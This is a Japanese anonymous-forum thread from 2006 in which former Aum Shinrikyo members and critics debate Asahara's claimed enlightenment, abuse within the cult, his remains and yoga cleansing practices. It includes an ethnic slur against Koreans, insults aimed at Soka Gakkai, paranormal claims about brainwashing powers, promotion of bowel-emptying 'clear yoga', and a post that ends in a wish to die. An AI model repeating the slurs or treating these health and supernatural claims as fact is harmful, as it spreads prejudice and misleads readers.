404 :名無しさん@3周年:2006/10/13(金) 21:57:35 ID:WzQAijdD
なぜまたウイルス攻撃?

405 :さくら:2006/10/13(金) 21:59:19 ID:eq7XHgQS
いったい何が気に入らないのやら。

406 :名無しさん@3周年:2006/10/13(金) 22:23:44 ID:sUkUVgBK
ホー湖面に写る虚像のような様々な
 
幻影に引きずられ輪廻ば浮沈する生き物達
 
彼らみなが絶対自由、絶対幸福なるマハーニルヴァーナに入るまで
 
四無量心込めてタントラヴァジラヤーナの発願ばしますばい。



407 :名無しさん@3周年:2006/10/13(金) 22:38:49 ID:gpVMIe6H
>>383 >グルの悪口をいい続けるということは、見苦しいとは言うものの、逆縁を深める効果はある。
「ゼノンのパラドックス」というものがある。理屈の上ではアキレスは亀に追い付けず弓から放たれた矢は空中で静止する。
教団はいつまでこのような虚しい空論をこねくり回すのだろうか。

408 :名無しさん@3周年:2006/10/13(金) 22:42:07 ID:gpVMIe6H
402
unixなのでウイルス関係無し。スクリプトが直接表示されるだけ

409 :名無しさん@3周年:2006/10/13(金) 22:42:41 ID:sUkUVgBK
親戚のおっさんがなくなったんだけど、ずっと別居していた奥方が
草加だったんで、ちと葬式がどうとか、大人同士で悶着したみたい
草加が主催してやると、葬式のとき、一般と草加関係で受付が
違うとかなんとか、、
層化の墓に入るとか、入んないとか、、

以前、母が、宗教やると、家族が離散するんだから、って怒っていたけど
わかるわ
他にも親が草加って人がいたんだけど、離婚していたしな



410 :名無しさん@3周年:2006/10/13(金) 22:44:07 ID:sUkUVgBK
オウムも死んだらオウムの墓に入るとか
前やってなかったっけ?
これだから新興宗教はいやだよ
なんでも長続きしない
オウムはいつも、教組の思いつき、企画倒れ

411 :名無しさん@3周年:2006/10/13(金) 22:46:43 ID:sUkUVgBK
教組死んだら、どこの墓に入るの?熊本かね
信者が列を作るんだろうけど
ご家族で、こないでくれ、とかいうかもね?

あるいは、家族のほうで、チヅオの骨なんかいらないっていうか

412 :名無しさん@3周年:2006/10/13(金) 22:48:00 ID:sUkUVgBK
あーわかった そんで、墓を暴いてホネを持っていく奴が必ずでるよ

嫌だねーー絶対いるよ

413 :名無しさん@3周年:2006/10/13(金) 22:49:12 ID:sUkUVgBK
やっぱり、あれでしょう?
ドラム缶で焼いて、ホネは砕くんだよね
そんで、みんなでありがたくわけるんでしょう

中には飲んだりする奴が出そう

414 :さくら:2006/10/13(金) 22:50:12 ID:eq7XHgQS
キモイけどほんとに居そうで怖い。

415 :名無しさん@3周年:2006/10/13(金) 22:54:05 ID:gpVMIe6H
信仰の対象になるのを防ぐ為に松本の実家で骨は処分すると昔、新聞で読んだ記憶がある。
是非そうしてもらいたいものだ。

416 :名無しさん@3周年:2006/10/13(金) 22:58:34 ID:1n81ioyZ
@桂馬さんは、エロ腹の子供産んで、女手一つで育ててる。
Aただし、桂馬さんだけでない。あのエロ腹は、いったい何人子供がいるんだろう?
Bミッターは兄に説得されて、現世に戻ったと言う。ならば、何かのきっかけで再び
 出家する可能性大。不細工だったので、エロ腹のお手が付く事もなかった。いや、
 お亀も突くことがなかった。
C今、いったい分派を入れたらどれくらいあるんだろう。


417 :名無しさん@3周年:2006/10/13(金) 22:58:39 ID:gnVgQbJ7
うんこのAAひたすら貼り付けているのも、ウィルスを貼り付けているのも
ID:EMkksd6bだな。
こいつ教団の工作員だな。教団の工作員だとばれないために「糞麻原」とか
「麻原さっさと死刑」と言っているんだな。

「グルと教団の悪口を言うことは妨害しなくてはいけない!!でも
教団関係者とばれるとまずい。ばれないようにグルの悪口をHNにしよう。
ヴァジラヤーナのザンゲには『心の成熟のためには口のカルマを積んでも
いい』とある。だからグルの悪口を言ったとしても、真理に仇なす者たちの
妨害ができるのだから、これは功徳になる」

という論理かな?

こんなことしてるひまがあったら、仏典でも読んで修行すればいいのに。
ほんとに教団は末期症状だね。

こうやってどんどん教団の危険性をこれを見ている公安にアピールしてほしい。

日本政府もすべての北朝鮮の船舶入港を禁止したり、輸入を禁止することを
決定した。北朝鮮は自分で自分の首を絞め続けている。

教団も自分で自分の首を絞め続けている。


418 :名無しさん@3周年:2006/10/13(金) 23:01:01 ID:sUkUVgBK
なあ、教団って、じけんはフリーメーソンの陰謀だって
(今はしらんけど)思っていたわけでしょ

それじゃあ、遺族に謝罪するとき、真顔で
(実はあれは、オウムじゃないんですよ、フリーメーソン、っていう、、)と
説明したりしたんだろうか?


419 :名無しさん@3周年:2006/10/13(金) 23:04:42 ID:sUkUVgBK
教組のご実家って、すっげー嫌な思いをされているんだろうね
かわいそうだね
ただでさえ、貧乏だとか、目が見えないとか
暗い話題が多そうだったのに

420 :名無しさん@3周年:2006/10/13(金) 23:16:40 ID:HBX4Efl+
いまだに信じてる奴って、哀れな自分を認めたくないだけだろ

421 :名無しさん@3周年:2006/10/13(金) 23:23:48 ID:gpVMIe6H
通常、死刑が執行されれば遺体は遺族が引き取る事が出来るが松本の場合、遺骨が信仰の対象となり
教団を強大化させる為の重要要素となり再び信者を集める、神格化に使われその先に先鋭暴走路線が
生ずる可能性がある為、特例的に国で火葬にし処分保管すべきである。
骨麻原を作ってはいけない。

422 :名無しさん@3周年:2006/10/13(金) 23:25:19 ID:HBX4Efl+
どっかの肥溜めに捨てとけばいいじゃん

423 :名無しさん@3周年:2006/10/13(金) 23:26:41 ID:HBX4Efl+
あんま難しく考えるなよ
いつまでたっても思春期の青き文学青年だなぁ

424 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/13(金) 23:33:37 ID:Pv+jJ5eC
>>381
>グルの悪口をあれこれと言うのは見苦しい。

意見するのは見苦しくないよ。反対にそんなこと言う君が見苦しい。

>尊師は先進国において全財産布施の出家修行者の弟子が千人以上いた。
それは最終解脱者の尊師しかできないことである。

仏典にそれが解脱者の条件とは書いてないよ。オウムへの布施は布施とは言わないよ。毟り取ったんだよ。
解脱者の証明はサマディでしたまえ。それが出来なかったんだから偽者。

>しかし、尊師はシヴァ神の意志に従って、自ら作った教団を破壊した。

違うよ。
犯罪を犯して崩壊させてしまったんだよ。自ら破壊したなら隠し部屋に隠れなくてもいいじゃん。

>それはキリストになれという指示があったからです。そのときに尊師は、
殺人者で性欲の強い凡夫に見えるような演技をした。

違うよ。彼の本音はそこにあった。
世界征服したかったんだ。そういうビジョンが見える話を得意になって話してたからね。神仙の会の頃。
で、そうはならなかったのだからそれは予言ではなく彼の心の汚れ。

>これもシヴァ神の意志であろう。戒律を守り修行を続ける弟子は、尊師のエネルギーが理解できるから、それが分かる。
かつて、尊師のエネルギーを感じることができて、 今は尊師のエネルギーが分からなくなっている人は、 自らの観念によって、尊師のエネルギーを遮断している。

却下。
真のリアリティは観念では遮断できない。遮断できるならそれは幻影。妄想。電波。

425 :名無しさん@3周年:2006/10/13(金) 23:42:39 ID:X5BVgigD
麻原彰晃っておっさんはヨガの修行にそこそこ成功して
有頂天になり自分は神と錯覚しちまったんだろうな
オレ達は、その阿呆の誇大妄想に振りまわされた馬鹿ってことよ

426 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/13(金) 23:43:02 ID:Pv+jJ5eC
>>382
>さて今回の救済活動で救済される人は、
(1)グルに帰依して、戒律を守り、修行する人

却下。救済活動などではないから。
それを証明するのは麻原が最終解脱者だったと証明しなくてはならない。そのためには公開サマディをすべきだったが
やらなかった=できなかった。ということで麻原は解脱していない。結果、救済活動なんかではない。

(2)グルに信はなくしたものの、自己の行動に責任を感じ、事件被害者に対する慈愛から、何らかの賠償活動を行い、戒律を守り、修行する人
この二通りの人である。

却下。
そんな相手の良心につけこんで自分たちに成り代わらせて賠償を払わせようたってそうはいかない。

>今回の救済活動で縁が深まる人は、ひたすら、尊師を憎み、悪口をいい続ける人である。

却下。
憎み続けるならばそういう風にもなろう。でも、そこから許したらどうだろうか?
許して、自分の心から麻原を解放すると・・・縁が深くなることはない。できてしまった縁は残るけどね。
縁とは一種の執着だから。

427 :サマナ服と機関銃:2006/10/13(金) 23:47:43 ID:z3GFqSgm
愛した麻原尊師を思い出に変えて
いつの日にかオウムの事を思い出すがいい
ただコーザルの片隅にでも
小さく記憶修習して

428 :名無しさん@3周年:2006/10/13(金) 23:48:13 ID:xL09MDEk
>>408
winでもウイルス関係無し。スクリプトが直接表示されるだけ

429 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/13(金) 23:51:32 ID:Pv+jJ5eC
>>383
>グルの悪口をいい続けるということは、見苦しいとは言うものの、逆縁を深める効果はある。

却下。
意見は見苦しくないし、あったことをあった。無かったことを無かったというのは見苦しくない。
そしてそれは悪口ではないので逆縁も真縁などでもない。
縁は関係ない。

>今ここで、いろいろと悪口を言い続ける人は、自分の胸に手を当ててよく考えて見ればいい。
なぜ自分は、このようなことを続けているのだろうか?
それは深い意識で、もしかしたら尊師は正しかったのではないかという、
恐怖心が残っているからである。それは深い意識であるから、本人も気づいていないかもしれない。

却下。
俺は一応君たちが言うコーザルまで瞑想で行けるけど恐怖心はどこにもない。


>本当に尊師を否定するのであれば、さっさと自分のやりたいことに集中すればいいのではないだろうか?

却下。
君たちは本当の意味での日本の未来、その真理に仇なすものだと思う。
だから君たちを否定してみせるのに意味が無いとは思わない。

>とは言うものの、いろいろとグルの悪口を言うのは、無関心であるよりは救われるので、 頑張ってほしいものだ。

却下。
俺は麻原のカルマを落としてやっているようなもの。
君たちのカルマを落としてやっているようなもの。
そっちが頑張れw


430 :名無しさん@3周年:2006/10/13(金) 23:55:12 ID:HBX4Efl+
ノートンでもウイルスバスターでもマカフィーでも、
ちゃんと除外設定しておけば
いたずらの影響受けないぞ

431 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/13(金) 23:55:38 ID:Pv+jJ5eC
>解脱したら何をしてもいいと、私は個人的にはそう思います

                      ナン○カ師かビ○パ師の名言
                      (どっちか忘れた)
ああ。これが彼らの本音だね。
好き勝手やらかすために修行してるのだね。

432 :名無しさん@3周年:2006/10/14(土) 00:00:31 ID:gpVMIe6H
どんな宗教も免罪符や免責が出てきて全ての正当化が始まる。

433 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 00:01:10 ID:p7gM8nmZ
>在家っていうのは出家を支えるものなんだよ ナン○カ師の名言

却下。
傲慢にもほどがある。
出家者は在家者によって支えて貰ってる。彼らがいなくては自分たちは修行に打ち込むことができない。
よって解脱した後はその恩恵を在家に振りまく義務がある。
支えて貰ったから解脱という自由を得たということ忘れてはならない。
まあ、それも分らない彼らが解脱しているとは思えないけどねw

434 :名無しさん@3周年:2006/10/14(土) 00:11:28 ID:r3Dmz2up
解脱したら、やりたいことなどなくなるって普通は思うよな?
欲から開放されるのに
ああしたいこうしたい、と突き動かされる理由がなくなる

435 :名無しさん@3周年:2006/10/14(土) 00:20:31 ID:A4+Km+/y
>>408
> unixなのでウイルス関係無し。スクリプトが直接表示されるだけ

大口 乙



436 :名無しさん@3周年:2006/10/14(土) 00:21:20 ID:ol9LsyQ1
「救済活動」をする人の潜在意識の本当の心の叫び
   「誰か私を救済してくれーーー!」

437 :名無しさん@3周年:2006/10/14(土) 00:24:50 ID:vR3kKWJd
あと、人助けをしてるとか、人より秀でていると思うことで
自分の存在価値をそこに見出したいんだろうな

438 :名無しさん@3周年:2006/10/14(土) 00:25:25 ID:kpJ3rAjq
オウムで真理を学び実践してるのに余計に苦しくなるのな。
不思議でしゃーない

439 :名無しさん@3周年:2006/10/14(土) 00:31:14 ID:ol9LsyQ1
普通の若い女の子って普通に幸せそうな感じだけど出家信者の女の子は「幸せオーラ」が出てなくて
全然綺麗じゃなくて哀れっぽい感じがする。

440 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 00:34:31 ID:p7gM8nmZ
>>350
>古株の女性幹部の中で、セイゴシになれなかったのってソーナーだけでしょう
その理由は、教組と肉体関係を要求されたとき、拒んだからか、と思ったけど
同時に、ウッパラバンナも、本人いわく、教組と私はそういう関係に無かったと
しかし、ここ数日で、ウッパラバンナもお手つきだったと告発がありましたけども、どっちが本当かね?
もし、ウッパラバンナはお手つきでなく、セイゴシであるなら肉体関係のあるなしに関わらず、ステージを上げていたわけだけど
もしウッパラバンナがお手つきなら、セイゴシになった女性は全員お手つき、ということにならないか?
つまり、愛人関係を結ばないなら、セイゴシにはなれないと規定があったと?

麻原は女はエネルギーが悪いから自分とセックスすれば浄化されるとのたまってたことがあるよ

441 :名無しさん@3周年:2006/10/14(土) 00:36:48 ID:OWfA8T/a
麻原とセックスしてもバカになるだけです。
結果は既に大量に出ています。

442 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 00:39:56 ID:p7gM8nmZ
>>441

正解。

443 :名無しさん@3周年:2006/10/14(土) 01:05:21 ID:r3Dmz2up
結論から言って、セイゴシの女性でお手つきでないのは誰と誰よ


444 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 01:12:42 ID:p7gM8nmZ
最近の清吾氏は知らないからなあ

445 :名無しさん@3周年:2006/10/14(土) 01:24:59 ID:v2BPe97/
ホモシヴァw

446 :名無しさん@3周年:2006/10/14(土) 01:32:41 ID:rFfyMxCe
>>445
また現役?
そこにしか価値基準とかないのかよ。
お前ら自分が情けなくない?

447 :名無しさん@3周年:2006/10/14(土) 01:44:31 ID:r3Dmz2up
普段、一人で勝手に出かけて楽しむけど
若いとき、入れ込んでいた場所が、(もう行けない場所)に
なったっての、寂しいよね

こんな、ひどい事をしでかさないでくれれば
今だって、週末くらい顔出して、ひまつぶししたいのにね
一度、価値観が顛倒してしまっているから
現世の人と、つっこんで付き合う気になれないんだよね



448 :名無しさん@3周年:2006/10/14(土) 01:52:44 ID:r3Dmz2up
非常に無慈悲だと思う
若い時分に、集めて、ガンガン洗脳して、
しかも、ほとんど誰にも、わかってもらえないこと
、、だって漏れらって、人を見るとき、
普通に人が人を見るのと、目線が違うもんねえ
どうせ執着しても、いつか死ぬんだとか、思いながら
友達作る奴はいないと思うし、、
何か楽しんでも、煩悩だの、無常だの思いながらいる人相手じゃ
相手もきっと、楽しくないよね、とか

リアルで付き合いするのも面倒だから、相手はネットが都合いいやとか
こうして何年たつんだ、、

449 :名無しさん@3周年:2006/10/14(土) 01:57:39 ID:r3Dmz2up
もっと、難のない、穏当な団体だったら、良かったのにね
どうして教組って、
世間で住みづらくなるほうへほうへ、もっていかないと気がすまないんだろうねえ

隠しておけば、表面楽じゃないかって、考えは理解できないよねえ
どうして、あんなにバカなんだろう


450 :名無しさん@3周年:2006/10/14(土) 02:06:26 ID:S12gt7Og
人殺しであれ刑務所以下としか思えないサティアン生活に耐える
強靭な根性体力があるのだろうし、密教ヨガの訓練をしてそうした能力
も体得してるのだろう。
人殺しであれ舐めたらいかんのではないか?



451 :名無しさん@3周年:2006/10/14(土) 02:06:41 ID:xVBcyeNr
物悲しい秋。
いい季節になってまいりました。

452 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 02:09:36 ID:p7gM8nmZ
普通、きちんとヨガやると楽に為っていくのにね。
心も身体も。解放されて楽になっていく。
でもオウムは違った。どんどん苦しくなっていく。

453 :名無しさん@3周年:2006/10/14(土) 02:10:57 ID:S12gt7Og
苫米地という人の洗脳原論を読んでも、オウムはただのキチ外
集団ではないと書いてある。
苫米地という人から見てもホメオパシー能力というのが凄い
らしいじゃないか。
なんでも苫米地によると、そのホメオパシー能力を使えば漫画
みたいにかめはめ波を撃って人を倒したり、10メートル先の
人間を言葉や映像といった媒介無しで洗脳して記憶を書きかえれる
とも書いてあるぞ。
ある意味最強伝説じゃないのか?

454 :名無しさん@3周年:2006/10/14(土) 02:13:45 ID:S12gt7Og
>>452
苦しいというのが具体的にどういう苦しさなのか知らないが、
スポーツ訓練でもハードなものは苦しいというか、重いバーベル
を苦労して持ち上げて筋肉を付けていくのではないか?



455 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 02:14:47 ID:p7gM8nmZ
>>450

いや。
そこの一番上で自分だけ美味しいものを食べて女はべらせてセックス三昧してたから多分耐えられない。
だから頭おかしくなったんだと思う。元からおかしいけどw
根性なんか無いよ。インドで30日の瞑想をしなさいって言われたのに3日で逃げ出した。
人を殺すのはその人が怖いから。即ち弱いから。
強かったら殺さない。怖くはないから。

456 :名無しさん@3周年:2006/10/14(土) 02:15:27 ID:S12gt7Og
解脱というのはオリンピックで金メダルを取るようなもので、
いくら努力しても運才能の問題もあり、凡人には得がたい境地
なのではないか?
それがアホでもできるものなら、長年仏教で崇拝の対象になる
はずがない。

457 :名無しさん@3周年:2006/10/14(土) 02:16:53 ID:IYHIezJz
人生は無意味な苦しみの連続。
生きることは虚しいだけ。
生まれて来ないのが最高の幸せ。

458 :名無しさん@3周年:2006/10/14(土) 02:17:38 ID:IYHIezJz
俺、死ぬ前に小学生の頃を
一日でいいから、またやってみたい
わいわい授業受けて、体育で外で遊んで、学校終わったら夕方までまた遊ぶんだ

空き地に夕焼け、金木犀の香りの中家に帰ると、家族が「おかえり〜」と迎えてくれて
TV見ながら談笑して、お母さんが晩御飯作ってくれる(ホントありがたいよな)
お風呂に入って上がったらみんな映画に夢中になってて、子供なのにさもわかってるように見入ってみたり
でも、全部見終える前に眠くなって、お部屋に戻って布団に入る
みんなのいる部屋の光が名残惜しいけど、そのうち意識がなくなって…




そして死にたい

459 :名無しさん@3周年:2006/10/14(土) 02:18:10 ID:IYHIezJz
人は死ぬ直前になって
「あぁたくさん働いて良かったな」とは思わない

多くの患者は「子どもの頃、精一杯遊んだこと」を思い出す
遊ぶこと、こそが真に大事だと知る
何をもって建設的と見なすか、その価値観は死ぬ直前に逆転する

それは海外旅行にカメラを持っていかずに
風景を目に焼き付けるのと同じで
人生では何も「残せるもの」などなかった
だから、遊びの「過程そのもの」が大事であったのだ

『よい結果』など、何もなかったのだと人は知る

460 :名無しさん@3周年:2006/10/14(土) 02:19:07 ID:DtYEvgIB
ID:S12gt7Og
オウム素人 乙

461 :名無しさん@3周年:2006/10/14(土) 02:19:38 ID:FNPH5Hn1


 このマスゴミによって画策された日本全国に蔓延している朝鮮気質


号泣だのなんだのアホかと、おまえらはケモノになりたいのか?

462 :名無しさん@3周年:2006/10/14(土) 02:19:40 ID:S12gt7Og
>>455
テレビでヨガ訓練の一環なのか、お腹の筋肉をグニャグニャ動かす
動作をやってるのを見たことがあるが、ああいう芸はそれなりの
訓練を積まないとできないものじゃないのか?
贅肉だけの腹じゃありゃできない。

463 :名無しさん@3周年:2006/10/14(土) 02:23:08 ID:S12gt7Og
もしかするとサティアンにはただのホームレスが飯を食う目的
で潜入してたという例もあるんじゃないか?
仕事や修行もサボれるほどいい加減で、なおかつ飯が食えるなら
ある意味共産主義みたいなものでホームレスの楽園だった面も
あるんじゃないか?
オウム食でも生ごみよりはマシだろ?


464 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 02:25:15 ID:p7gM8nmZ
>454
>苦しいというのが具体的にどういう苦しさなのか知らないが、スポーツ訓練でもハードなものは苦しいというか、重いバーベル
を苦労して持ち上げて筋肉を付けていくのではないか?

それは耐性を上げていってるわけでしょ?でもどっかで限界が生じる。
ヨガはその苦と自分とを切り離してしまおうという道。

ヒマラヤの高度に住む行者たちは、平均気温-20度近いその環境で暮らしているのにも関わらず
ほとんど裸に近い状態で平気です。
ある方が彼らの一人に聞きました。
「そんな姿で寒くないのか?」
行者「寒いさ。人間なんだから」
「ならば着込めばいいじゃないか」
行者「寒いさ。でもこれで問題ないんだ。苦しくはない」
と答えました。


465 :名無しさん@3周年:2006/10/14(土) 02:26:02 ID:S12gt7Og
神秘ビジョンが見えたとか、空中浮遊したなんてのも、他の
宗教団体にくらべたら幸せと言えるんじゃないか?
他ではいくら頑張っても何もそうした宗教的なものがまったく
無いという例も多いじゃないか?
何かがあったなら、そりゃ割高であったとしても、少なくとも
完全詐欺ではないのと違うか?
ヨガ訓練で軽い病気が治ったなんて人もいるんだろうしな。


466 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 02:26:55 ID:p7gM8nmZ
>>462

訓練しないと確かにできないね。
でも、あれはそこまで難しいレベルでもないよ

467 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 02:28:36 ID:p7gM8nmZ
>>453
>苫米地という人の洗脳原論を読んでも、オウムはただのキチ外集団ではないと書いてある。
苫米地という人から見てもホメオパシー能力というのが凄いらしいじゃないか。
なんでも苫米地によると、そのホメオパシー能力を使えば漫画みたいにかめはめ波を撃って人を倒したり、10メートル先の
人間を言葉や映像といった媒介無しで洗脳して記憶を書きかえれるとも書いてあるぞ。
ある意味最強伝説じゃないのか?

でも、そのことは苫米地さんは証明できてない。


468 :名無しさん@3周年:2006/10/14(土) 02:32:28 ID:/CCwFNaZ
>>465
お前の頭は直らんのじゃないか?w

469 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 02:43:04 ID:p7gM8nmZ
>456
>解脱というのはオリンピックで金メダルを取るようなもので、いくら努力しても運才能の問題もあり、凡人には得がたい境地なのではないか?

う〜ん。
その金メダルにも興味を示さなくなるのが解脱だと思う。

>それがアホでもできるものなら、長年仏教で崇拝の対象になるはずがない。

そのアホが無茶苦茶な宗教を展開したからあっという間に終わった。
ま、騙されてた俺らもアホだがねw

470 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 02:49:09 ID:p7gM8nmZ
>>465
>神秘ビジョンが見えたとか、空中浮遊したなんてのも、他の宗教団体にくらべたら幸せと言えるんじゃないか?
他ではいくら頑張っても何もそうした宗教的なものがまったく無いという例も多いじゃないか?

いや。他の団体でも同じことできるとこあるし。それに他の団体の方が凄い場合もある。

>何かがあったなら、そりゃ割高であったとしても、少なくとも完全詐欺ではないのと違うか?

最初に本物らしいものを少しだけ提供し、後でまったくの偽者を掴ませる。
詐欺師のやり口。

>ヨガ訓練で軽い病気が治ったなんて人もいるんだろうしな。

それはヨガ本来の力であってオウムの力ではないね

471 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 02:55:32 ID:p7gM8nmZ
>神秘ビジョンが見えたとか、

これなんかヒマラヤヨガやチベット仏教、テーラヴァーダ仏教の方がもっと凄くて
仏典に出ているようなものをストレートに見たりするので(例;ニミッタ)
オウムで見る神秘体験なんか比較にならない。
というか、昔「神秘体験ならシヴァナンダに聞け」と言われてた俺でもテーラヴァーダの瞑想や
ヒマラヤヨガの瞑想で体験したことは、昔のそれをまるで問題にしない凄いものだった。

472 :名無しさん@3周年:2006/10/14(土) 02:56:04 ID:dm92B+p+
シヴァの喜びタンに、これあげる
http://blog66.fc2.com/t/tuch/file/200505031617.jpg

473 :名無しさん@3周年:2006/10/14(土) 02:57:14 ID:QGoxCxs+
今でも時々サンカとかのクリアヨガやるんだけどあれは何処から
引っ張ってきたの。それ専門の書籍とか知ってる人いない?
ある程度効果というか…感じてて今でも続けてるんだけど
上から下まで腸の中空っぽになると固形物摂取するの非常に煩わしく
なるんだよね。修行もやりやすくなる。

474 :名無しさん@3周年:2006/10/14(土) 02:59:56 ID:jkS/+SYE
無料体験者は何を語っても中身が無料体験者。
その証拠に無料体験者とすぐ分かる。プッ

475 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 03:01:30 ID:p7gM8nmZ
>>473

たしか「魂の科学 実践編」にあったように思う。
クリアは修行の内容を濃くして解脱までの時間を短縮するというからね。

476 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 03:10:45 ID:p7gM8nmZ
>>457
>人生は無意味な苦しみの連続。生きることは虚しいだけ。生まれて来ないのが最高の幸せ。

ところがどっこい、苦しみがないと修行しようとは思わない。苦しみがないとそこから解放されようとは思わない。
その虚しさがないと満たすものを探さない。
生まれてこないと解脱ができない。修行しない。

477 :名無しさん@3周年:2006/10/14(土) 03:16:41 ID:QGoxCxs+
>>475
>たしか「魂の科学 実践編」にあったように思う。
>クリアは修行の内容を濃くして解脱までの時間を短縮するというからね。
 
おおぉぉ。シヴァの喜びさんレスありがとうございます。
「魂の科学 実践編」早速買って読んでみたいと思います。
ステージの低い私のような者でも非常に効果を実感できるもので…^^;
お礼もできませんが…シヴァ氏が早く解脱できますように゜(-m-)パンパン

478 :名無しさん@3周年:2006/10/14(土) 03:17:53 ID:L32SomMA
>>465
> 神秘ビジョンが見えたとか、空中浮遊したなんてのも、他の
> 宗教団体にくらべたら幸せと言えるんじゃないか?

とっても幸せ。うふっ

479 :名無しさん@3周年:2006/10/14(土) 03:23:00 ID:dm92B+p+
解脱したら、末期がんみたいな断末魔の苦しみもないのですか?
全身火だるまになっても苦しくないのですか?

480 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 03:24:07 ID:p7gM8nmZ
>>477

古い本だしもしかしたら絶版かも。
もしそうなら古本屋さん探してみてね。

でもクリアヨーガはああいう物理的なクリアもいいけど、心を一時的に止めるクリアとか
速やかに深い瞑想状態に導くクリアとか、簡単で安全なクンダリニー覚醒のクリアとかの
霊的クリアもあるよ。
そっちがクリアヨガの本質かも。

481 :名無しさん@3周年:2006/10/14(土) 03:32:12 ID:D5Fl5A1e
出てますよ。

実践・魂の科学
http://www.amazon.co.jp/exec/obidos/ASIN/4884811623



482 :名無しさん@3周年:2006/10/14(土) 03:33:23 ID:S12gt7Og
>>471
たとえば日本のクルマ産業の黄金時代を作った偉人の一人に本田宗一郎
という人がいる。
彼のクルマは一応走るものの欠陥だらけで、たくさん死亡者が出てる。
ホンダ宗一郎は精神異常者だったという説もある。
現代なら刑務所行き確実かも知れない。
しかしなんであれ彼のチャレンジスピリットで現代の自動車産業の裾野が
広がったという偉大なるスターターの面もあるじゃないか?
他にも世の中には偉大なる一人の馬鹿から生まれたものは多いはず。
オウムも結果としては世にテーラバダやヒマラヤヨガを広めるきっかけを
作った偉大なるスターターだったが、同時に欠陥品だったとか後々評価される
のではないか?


483 :名無しさん@3周年:2006/10/14(土) 03:34:26 ID:QGoxCxs+
>>480
なるほど。クリアヨガといっても色々種類があるのですね。
やめてからも、どうもオウムの修行法や教義がベースになってしまっているだけに
一から出直ししないと駄目ですね。;;
今度は妄信せずに慎重に頑張りたいと思ってます。ありがとうございます。

484 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 03:35:29 ID:p7gM8nmZ
>>479

ラーマ・クリシュナという聖者は癌に侵されていたけど、確かに痛いんだけど
それによって心が乱されることはなかったそうです。
苦痛と自分とを切り離していたといいます。

火だるまも、見た経験とかないのでなんとも言いがたいですが、こういうのはどうでしょう。
お釈迦様は毒キノコの供養を受けて、それを毒キノコだと知りながら食べたそうです。
で、大変な激痛の中で涅槃に入られた。
つまり、その苦痛の中、初禅から起って二禅>三禅>四禅・・・という具合に瞑想のプロセスを
最終段階である滅想受定まで行き、今度は逆に初禅までいって、最後はまた初禅から起って最後に涅槃に
入ったそうです。
つまり、その激痛から自分を切り離して瞑想のプロセスを弟子に示しながら、まったく平穏に、最後は涅槃に
入っていった。

485 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 03:37:25 ID:p7gM8nmZ
>>481

おお。
まだあるのか。
サンキュー。
俺も誰かに貸したまま返って来ないし、誰に貸したか忘れたので買いなおすw

486 :名無しさん@3周年:2006/10/14(土) 03:38:47 ID:S12gt7Og
上祐などがもしかしたら、平和的な仏教を確立して評価されたり
するのかも知れないが、彼とて麻原さんというきっかけがいて
宗教の道に入ったというのはあるだろう。
もし麻原さんがいなかったら、今頃しがない公務員だったのではないか?
世の中には強盗殺人犯から素晴らしい子供が生まれて、世に貢献したという
例もある訳で、それを目指されたらいいのではないか?


487 :名無しさん@3周年:2006/10/14(土) 03:39:29 ID:z2B7PGzL
『ヨーガ・からだと心の浄化法』のクリアの部分も分かりやすかった。
魂の科学の一部分を分かりやすくした感じだけどね。

ヨーガ・からだと心の浄化法
http://www.amazon.co.jp/gp/product/4796603271/sr=1-2/qid=1160764175/ref=sr_1_2/250-9425277-1696250?ie=UTF8&s=books

488 :名無しさん@3周年:2006/10/14(土) 03:40:20 ID:QGoxCxs+
シヴァの喜びさんお先に2400円の新品/ユーズド価格買ってしまいました。
次は4000円になってしまいます・・・すいません。^^;

489 :名無しさん@3周年:2006/10/14(土) 03:42:02 ID:S12gt7Og
>>484
交通事故で足が折れたり、内臓が出てる人でもその時は脳内麻薬
で痛みを忘れ、逆に気持ち良かったなんて話は普通人でもあるじゃないか。
そうした現象なら癌でも痛くも痒くもないかも知れない。
外科手術でも麻酔したら痛くないんだし。

490 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 03:42:29 ID:p7gM8nmZ
>>486

それは認める。
麻原が為した数少ない善行はきっかけ作りと反面教師ということだと思う。
でも、それが麻原が解脱していたことには結びつかないとだけは言っておくw

491 :名無しさん@3周年:2006/10/14(土) 03:42:33 ID:Z5EOd7lD
>>483
> やめてからも、どうもオウムの修行法や教義がベースになってしまっているだけに
> 一から出直ししないと駄目ですね。;;

ダメダメ、まるでダメ。
オウム凄いけど。プッ

492 :名無しさん@3周年:2006/10/14(土) 03:43:22 ID:dm92B+p+
>>484ありがとうございます。
苦しいには苦しいが、心は平穏なんですね。
我慢強いのとは違うのですか?
解脱してなくても、我慢強い人はレベルが高いのでしょうか?

493 :名無しさん@3周年:2006/10/14(土) 03:45:14 ID:S12gt7Og
脳内麻薬とヨガの力が同じものかどうかは知らないが、前述した
ように脳内麻薬で交通事故で体が破損しても痛みを感じなかった
という例は多々あるし、脳内麻薬で貧乏な人が頑張って働き、
商売などで成功したという例も多々ある。
こうした一般人から見たら不思議なものはその体験者の多さから
言ってあるものなのだろう。

494 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/14(土) 03:49:42 ID:p7gM8nmZ
>>489

それって一時的なものだよね?
で、薬が切れたら、脳内麻薬の分泌が止まったら終わり。とたんに苦痛が押し寄せる。
ラーマ・クリシュナやお釈迦さまは永続していた。
